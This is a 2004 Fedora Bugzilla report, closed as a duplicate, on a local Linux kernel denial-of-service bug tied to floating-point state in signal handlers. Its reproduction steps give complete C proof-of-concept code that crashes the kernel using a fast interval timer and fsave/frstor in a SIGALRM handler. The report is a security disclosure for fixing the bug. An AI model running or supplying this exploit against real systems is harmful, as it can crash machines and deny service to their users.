Bug 125940 - Local kernel denial of service exploit
Local kernel denial of service exploit
Status: CLOSED DUPLICATE of bug 125912
Product: Fedora
Classification: Fedora
Component: kernel (Show other bugs)
2
All Linux
medium Severity medium
: ---
: ---
Assigned To: Arjan van de Ven
Brian Brock
: Security
Depends On:
Blocks:
  Show dependency treegraph
 
Reported: 2004-06-14 09:21 EDT by Nils O. Selåsdal
Modified: 2007-11-30 17:10 EST (History)
0 users

See Also:
Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of:
Environment:
Last Closed: 2006-02-21 14:04:04 EST
Type: ---
Regression: ---
Mount Type: ---
Documentation: ---
CRM:
Verified Versions:
Category: ---
oVirt Team: ---
RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: ---


Attachments (Terms of Use)

  None (edit)
Description Nils O. Selåsdal 2004-06-14 09:21:48 EDT
From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7)
Gecko/20040608 Firefox/0.8

Description of problem:
Seems there is a local kernel denial of service exploit in just about
any kernel out there.
Info is at http://linuxreviews.org/news/2004-06-11_kernel_crash/index.html
Fedora Core should be updated. RHEL should be investigated.


Version-Release number of selected component (if applicable):


How reproducible:
Always

Steps to Reproduce:
1. compile and run:
#include <sys/time.h>
  #include <signal.h>
  #include <unistd.h>
  
  static void Handler(int ignore)
  {
   char fpubuf[108];
   __asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf));
   write(2, "*", 1);
   __asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf));
  }
  
  int main(int argc, char *argv[])
  {
   struct itimerval spec;
   signal(SIGALRM, Handler);
   spec.it_interval.tv_sec=0;
   spec.it_interval.tv_usec=100;
   spec.it_value.tv_sec=0;
   spec.it_value.tv_usec=100;
   setitimer(ITIMER_REAL, &spec, NULL);
   while(1)
    write(1, ".", 1);
  
   return 0;
  }


Additional info:
Appears that the kernel doesn't handle floating point exeptions in
signal handlers.
Comment 1 Dave Jones 2004-06-14 12:12:55 EDT

*** This bug has been marked as a duplicate of 125912 ***
Comment 2 Red Hat Bugzilla 2006-02-21 14:04:04 EST
Changed to 'CLOSED' state since 'RESOLVED' has been deprecated.

Note You need to log in before you can comment on or make changes to this bug.